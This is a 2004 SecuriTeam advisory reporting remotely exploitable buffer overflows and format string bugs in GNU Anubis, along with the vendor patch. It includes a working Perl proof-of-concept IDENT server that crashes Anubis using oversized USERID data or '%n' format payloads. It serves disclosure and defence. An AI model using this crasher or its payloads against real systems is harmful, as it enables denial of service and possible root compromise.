[UNIX] GNU Anubis Buffer Overflows and Format String Bugs

From: SecuriTeam (support_at_securiteam.com)
Date: 03/08/04

  • Next message: SecuriTeam: "[NEWS] Cisco CSS 11000 Series Content Services Switches Malformed UDP Packet Vulnerability" 
    To: list@securiteam.com
Date: 8 Mar 2004 18:39:41 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      GNU Anubis Buffer Overflows and Format String Bugs
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.gnu.org/software/anubis/> GNU Anubis is "an outgoing mail
    processor. It goes between the MUA (Mail User Agent) and the MTA (Mail
    Transport Agent), and can perform various sorts of processing and
    conversion on-the-fly in accordance with the sender's specified rules,
    based on a highly configurable regular expressions system. It operates as
    a proxy server, and can edit outgoing mail headers, encrypt or sign mail
    with the GnuPG, build secure SMTP tunnels using the TLS/SSL encryption
    even if your mail user agent doesn't support it, or tunnel a connection
    through a SOCKS proxy server".

    Ulf Harnhammar has found two buffer overflows and three format string bugs
    in GNU Anubis. They can all be remotely exploited, potentially to get root
    access, as GNU Anubis usually runs as root and drops its privileges after
    executing some of the vulnerable functions.

    DETAILS

    Vulnerable Systems:
     * GNU Anubis versions 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1

    Immune Systems:
     * GNU Anubis version 3.6.2 with vendor patch, 3.9.93 with vendor patch,
    latest CVS

    a) There are two buffer overflows in the function auth_ident() in auth.c.
    The overflows are caused by sscanf() format strings of the type "%s"
    instead of "%63s".

    b) There are format string bugs in three instances of the syslog() call.
    They are located in the function info() in log.c, the function
    anubis_error() in errs.c and the function ssl_error() in ssl.c. The
    vulnerable functions take strings partially made up of user-supplied data,
    and use them as the format string instead of using them as parameters
    ('syslog(priority, string);' instead of 'syslog(priority, "%s",
    string);'). These format string bugs become a bigger problem if you set
    termlevel to VERBOSE or DEBUG, as GNU Anubis then will log more data with
    the syslog() facility.

    Solution:
    The vendor has released official security patches for 3.6.2 and 3.9.93.
    They can be downloaded from the program's homepage. They correct both the
    buffer overflows and the format string bugs.

    Proof of concept:
    One of the methods of attacking GNU Anubis is through IDENT data, as it
    always connects to the client's IDENT server to get more information about
    the client. I wrote a simple malicious IDENT server in Perl. It crashes
    the current instance of GNU Anubis, either by using the buffer overflows
    or by using the format string bugs.

    Here it is:
    #!/usr/bin/perl --
    # anubis-crasher
    # Ulf Harnhammar 2004
    # I hereby place this program in the Public Domain.

    use IO::Socket;

    sub usage()
    {
      die "usage: $0 type\n".
          "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
    } # sub usage

    $port = 113;

    usage() unless @ARGV == 1;
    $type = shift;
    usage() unless $type =~ m|^[ab]$|;

    $send{'a'} = 'U' x 400;
    $send{'b'} = '%n' x 28;
    $sendstr = $send{$type};

    $server = IO::Socket::INET->new(Proto => 'tcp',
                                    LocalPort => $port,
                                    Listen => SOMAXCONN,
                                    Reuse => 1) or
              die "can't create server: $!";

    while ($client = $server->accept())
    {
      $client->autoflush(1);
      print "got a connection\n";

      $input = <$client>;
      $input =~ tr/\015\012//d;
      print "client said $input\n";

    # $wait = <STDIN>;
    # $wait = 'be quiet, perl -wc';

      $output = "a: USERID: a:$sendstr";
      print $client "$output\n";
      print "I said $output\n";

      close $client;
      print "disconnected\n";
    } # while client=server->accept

    __END__

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:Ulf.Harnhammar.9485@student.uu.se> Ulf Harnhammar.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Cisco CSS 11000 Series Content Services Switches Malformed UDP Packet Vulnerability"

    Relevant Pages